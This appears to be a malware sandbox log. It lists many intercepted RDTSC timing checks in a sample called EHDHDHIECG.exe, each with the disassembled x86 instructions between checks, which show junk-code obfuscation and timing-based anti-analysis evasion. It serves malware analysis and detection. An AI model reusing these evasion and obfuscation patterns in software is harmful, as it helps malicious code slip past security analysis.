Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300E24 second address: 5300E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD8Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300E34 second address: 5300EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FEE84E88FCAh 0x0000000f pushfd 0x00000010 jmp 00007FEE84E88FD2h 0x00000015 sub cx, 8DB8h 0x0000001a jmp 00007FEE84E88FCBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FEE84E88FD9h 0x00000027 sbb al, 00000056h 0x0000002a jmp 00007FEE84E88FD1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esp], ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300EA6 second address: 5300EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03EB second address: 52E03F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03F1 second address: 52E03F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03F5 second address: 52E03F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03F9 second address: 52E0416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007FEE851EFD8Eh 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0416 second address: 52E043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEE84E88FD9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E043D second address: 52E0441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0441 second address: 52E0447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0447 second address: 52E044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E044C second address: 52E0462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 6249E01Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and dword ptr [eax+04h], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0462 second address: 52E0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0479 second address: 52E04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov esi, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007FEE84E88FD3h 0x00000012 mov di, ax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov edi, 46F70356h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C06DF second address: 52C071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEE851EFD97h 0x00000008 pop ecx 0x00000009 jmp 00007FEE851EFD99h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C071D second address: 52C0721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0721 second address: 52C0734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0734 second address: 52C076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE84E88FD8h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C076F second address: 52C077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D0FB8 second address: 52D0FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E01EA second address: 52E0204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 23C26A22h 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 mov cl, 7Ah 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0204 second address: 52E0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300660 second address: 5300686 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2C5BC4C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE851EFD99h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300686 second address: 53006BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, bx 0x0000000f mov bh, 85h 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 jmp 00007FEE84E88FD0h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006BC second address: 53006C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006C0 second address: 53006DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006DC second address: 53006E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006E2 second address: 53006E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006E6 second address: 530075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a jmp 00007FEE851EFD8Fh 0x0000000f mov di, ax 0x00000012 popad 0x00000013 mov eax, dword ptr [76FA65FCh] 0x00000018 pushad 0x00000019 mov ecx, 51E6A537h 0x0000001e call 00007FEE851EFD8Ch 0x00000023 pop edi 0x00000024 popad 0x00000025 test eax, eax 0x00000027 pushad 0x00000028 call 00007FEE851EFD8Ah 0x0000002d movzx ecx, bx 0x00000030 pop edi 0x00000031 mov esi, 3F8F41B3h 0x00000036 popad 0x00000037 je 00007FEEF6E12FB9h 0x0000003d pushad 0x0000003e mov cx, 342Bh 0x00000042 call 00007FEE851EFD90h 0x00000047 mov edi, ecx 0x00000049 pop ecx 0x0000004a popad 0x0000004b mov ecx, eax 0x0000004d pushad 0x0000004e push edx 0x0000004f mov di, cx 0x00000052 pop eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pop eax 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 530075E second address: 5300798 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE84E88FCDh 0x00000008 jmp 00007FEE84E88FCBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 jmp 00007FEE84E88FCFh 0x00000019 and ecx, 1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300798 second address: 530079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 530079E second address: 53007A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53007A4 second address: 53007A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53007A8 second address: 5300801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d jmp 00007FEE84E88FD0h 0x00000012 leave 0x00000013 pushad 0x00000014 mov edi, ecx 0x00000016 pushfd 0x00000017 jmp 00007FEE84E88FCAh 0x0000001c xor eax, 309C2538h 0x00000022 jmp 00007FEE84E88FCBh 0x00000027 popfd 0x00000028 popad 0x00000029 retn 0004h 0x0000002c nop 0x0000002d mov esi, eax 0x0000002f lea eax, dword ptr [ebp-08h] 0x00000032 xor esi, dword ptr [00732014h] 0x00000038 push eax 0x00000039 push eax 0x0000003a push eax 0x0000003b lea eax, dword ptr [ebp-10h] 0x0000003e push eax 0x0000003f call 00007FEE89A997EFh 0x00000044 push FFFFFFFEh 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300801 second address: 5300807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300807 second address: 5300824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300824 second address: 5300863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007FEE851EFD8Eh 0x00000011 ret 0x00000012 nop 0x00000013 push eax 0x00000014 call 00007FEE89E005FAh 0x00000019 mov edi, edi 0x0000001b jmp 00007FEE851EFD90h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300863 second address: 5300867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300867 second address: 53008C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, si 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEE851EFD95h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov eax, 5E95F493h 0x00000017 movzx esi, di 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bx, ax 0x00000023 pushfd 0x00000024 jmp 00007FEE851EFD98h 0x00000029 sbb cx, 4848h 0x0000002e jmp 00007FEE851EFD8Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0072 second address: 52B00E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c mov di, 1E76h 0x00000010 pop edx 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FEE84E88FD4h 0x0000001e and si, 9398h 0x00000023 jmp 00007FEE84E88FCBh 0x00000028 popfd 0x00000029 mov cx, 054Fh 0x0000002d popad 0x0000002e and esp, FFFFFFF8h 0x00000031 jmp 00007FEE84E88FD2h 0x00000036 xchg eax, ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00E3 second address: 52B00E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00E7 second address: 52B00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00ED second address: 52B00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00F3 second address: 52B00F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00F7 second address: 52B0111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0111 second address: 52B011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 91E9h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B011A second address: 52B013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 1Bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE851EFD95h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B013C second address: 52B0151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0151 second address: 52B0157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0157 second address: 52B015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B015B second address: 52B0206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 mov cx, 5E8Dh 0x00000014 popad 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007FEE851EFD99h 0x0000001c sbb cx, A816h 0x00000021 jmp 00007FEE851EFD91h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007FEE851EFD8Eh 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 mov ebx, esi 0x00000033 pushad 0x00000034 call 00007FEE851EFD8Fh 0x00000039 pop esi 0x0000003a popad 0x0000003b popad 0x0000003c mov ebx, dword ptr [ebp+10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FEE851EFD90h 0x00000048 xor eax, 3BB665C8h 0x0000004e jmp 00007FEE851EFD8Bh 0x00000053 popfd 0x00000054 mov si, 6F3Fh 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0206 second address: 52B020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B020C second address: 52B02C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007FEE851EFD94h 0x00000012 movzx ecx, dx 0x00000015 pop edx 0x00000016 movzx ecx, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c call 00007FEE851EFD94h 0x00000021 movzx eax, di 0x00000024 pop ebx 0x00000025 mov cx, 0B83h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FEE851EFD94h 0x00000032 sub cx, 8F48h 0x00000037 jmp 00007FEE851EFD8Bh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FEE851EFD98h 0x00000043 add si, 51A8h 0x00000048 jmp 00007FEE851EFD8Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov esi, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02C2 second address: 52B02C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02C6 second address: 52B02CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02CA second address: 52B02D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02D0 second address: 52B02E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02E5 second address: 52B02E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02E9 second address: 52B0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0306 second address: 52B030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B030C second address: 52B0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0310 second address: 52B0336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e jmp 00007FEE84E88FD7h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0336 second address: 52B03CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE851EFD8Fh 0x00000009 jmp 00007FEE851EFD93h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FEE851EFD98h 0x00000015 adc si, 6D88h 0x0000001a jmp 00007FEE851EFD8Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, edi 0x00000024 pushad 0x00000025 mov eax, 68103F1Bh 0x0000002a jmp 00007FEE851EFD90h 0x0000002f popad 0x00000030 test esi, esi 0x00000032 jmp 00007FEE851EFD90h 0x00000037 je 00007FEEF6E5DFE7h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 call 00007FEE851EFD8Ch 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03CA second address: 52B03ED instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, 2664AC92h 0x0000000c popad 0x0000000d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEE84E88FCBh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03ED second address: 52B03F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03F1 second address: 52B03F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03F7 second address: 52B03FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03FD second address: 52B0401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0401 second address: 52B0405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0405 second address: 52B047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEEF6AF71E4h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEE84E88FD8h 0x00000015 or ecx, 3D811708h 0x0000001b jmp 00007FEE84E88FCBh 0x00000020 popfd 0x00000021 call 00007FEE84E88FD8h 0x00000026 movzx eax, bx 0x00000029 pop edi 0x0000002a popad 0x0000002b mov edx, dword ptr [esi+44h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FEE84E88FD9h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B047A second address: 52B04F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE851EFD93h 0x00000009 and ecx, 2817B20Eh 0x0000000f jmp 00007FEE851EFD99h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FEE851EFD8Eh 0x00000020 test edx, 61000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ch, bh 0x0000002b pushfd 0x0000002c jmp 00007FEE851EFD96h 0x00000031 add al, FFFFFFE8h 0x00000034 jmp 00007FEE851EFD8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
